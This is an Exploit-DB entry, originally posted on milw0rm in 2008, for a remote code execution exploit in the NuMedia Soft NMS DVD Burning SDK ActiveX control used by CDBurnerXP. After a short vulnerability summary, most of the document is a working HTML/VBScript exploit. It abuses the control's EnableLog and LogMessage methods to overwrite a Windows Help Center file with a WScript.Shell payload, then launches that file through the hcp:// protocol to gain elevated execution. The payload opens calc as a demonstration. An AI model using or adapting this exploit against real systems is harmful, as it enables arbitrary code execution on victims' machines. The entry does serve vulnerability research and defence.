NuMedia Soft NMS DVD Burning SDK Activex (NMSDVDX.dll) remote exploit

vendor:

NMS DVD Burning SDK Activex

by:

Nine:Situations:Group::bruiser

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: NMS DVD Burning SDK Activex

Affected Version From: CDBurnerXP 4.2.1.976

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: IE6

2008

NuMedia Soft NMS DVD Burning SDK Activex (NMSDVDX.dll) remote exploit

The NuMedia Soft NMS DVD Burning SDK Activex (NMSDVDX.dll) is vulnerable to a remote code execution vulnerability. An attacker can use the “EnableLog” method to overwrite a specified file and the “LogMessage” one to write new lines on it. Through the Help and Support Center and the pluggable “hcp://” protocol, the attacker can launch their file. The Help Center will host the page with elevated privileges, allowing the page to script arbitrary controls with no prompts presented to the user.

Mitigation:

An “unlicensed software” box appears, however, if the user closes it or clicks “OK”, the code will run normally.

Source

Exploit-DB raw data:

<!--
5.06 19/09/2008 -----------------------------------------------------------

-- NuMedia Soft NMS DVD Burning SDK Activex (NMSDVDX.dll) remote exploit --
by Nine:Situations:Group::bruiser

software site: http://www.nugroovz.com/
our site: http://retrogod.altervista.org/

affected software: CDBurnerXP 4.2.1.976, ??
tested against IE6

settings:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data  
IPersist Safe:  Safe for untrusted: caller,data  

mitigation: an "unlicensed software" box appears
however, if the user close it or click "OK", the code will run normally

explaination: "EnableLog" method can be used to overwrite a specified file,
"LogMessage" one to write new lines on it. 
Trough the Help and Support Center and the pluggable "hcp://" protocol you 
can launch your file. Important to note: the Help Center will host the page 
with elevated privileges, allowing the page to script arbitrary controls 
with no prompts presented to the user.
This was suggested by rgod (see hj forum) as a way to immediately execute
the shell
---------------------------------------------------------------------------

-->
<html>
<title> :( </title>
<object classid='clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938' id='DVDEngineX' />
</object>

<script language='vbscript'>
    
    DVDEngineX.Initialize True
    
    sLogFileName="C:\\WINDOWS\\PCHEALTH\\HELPCTR\\System\\sysinfo\\msinfo.htm"
    bCreateNew=True
    DVDEngineX.EnableLog sLogFileName ,bCreateNew 
    
    nl=unescape("%0d%0a")
    'my garbage ...
    sMsg="<HTML>" & _
         "<SCRIPT LANGUAGE=VBScript>" & nl & _
         "Dim WshShell, oExec" & nl & _
         "Set WshShell = CreateObject(""WScript.Shell"")" & nl & _
         "Set oExec = WshShell.Exec(""calc"")" & nl & _ 
         "Do While oExec.Status = 0" & nl & _
         "WScript.Sleep 100" & nl & _
         "Loop" & nl & _
         "WScript.Echo oExec.Status" & nl & _
         "<" & Chr(47) & "SCRIPT>" & nl & _
         "<" & Chr(47) & "HTML>" 
    DVDEngineX.LogMessage sMsg 
    
    window.location = "hcp://system/sysinfo/msinfo.htm"

</script>
</html>

# milw0rm.com [2008-09-19]